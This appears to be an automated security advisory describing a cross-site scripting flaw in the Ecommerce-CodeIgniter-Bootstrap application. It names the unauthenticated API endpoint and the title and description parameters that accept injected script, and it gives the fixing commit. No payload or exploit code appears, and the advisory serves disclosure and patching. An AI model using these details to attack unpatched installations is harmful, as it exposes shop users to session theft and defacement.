Impact
The vulnerability resides in the Hidden REST API Endpoint /index.php/api/product/set of the kirilkirkov Ecommerce‑CodeIgniter‑Bootstrap application. Manipulating the title or description parameters leads to client‑side script injection. This allows an attacker to inject arbitrary JavaScript, which when executed in a victim’s browser can steal session data, deface pages, or perform malicious actions. The weakness is an input validation flaw identified as CWE‑79 and code injection via improper handling of user data (CWE‑94). The impact is an exclusively web‑based attack that can compromise the confidentiality and integrity of user sessions.
Affected Systems
The affected system is the kirilkirkov Ecommerce‑CodeIgniter‑Bootstrap web application. All releases prior to the commit hash d9785f995da77bdc62fb2d34bad5f7a162c9ad23 are vulnerable because the patch addresses the XSS issue. The product uses a rolling release model, so a user should update to the latest commit or code branch that includes the fix.
Risk and Exploitability
The CVSS score is 5.3, indicating a medium severity issue. No EPSS data is available, and the vulnerability is not listed in the CISA KEV catalog. The exploitation requires remote access to the API endpoint, so it can be carried out by any external party who can craft an HTTP request carrying malicious title or description payloads. Because no authentication is required to reach the endpoint, the risk is relatively high for exposed installations that run the affected version. The lack of an EPSS score suggests that exploitation frequency data is not currently tracked, but the publicly disclosed exploit indicates that attackers could deploy this XSS payload.
OpenCVE Enrichment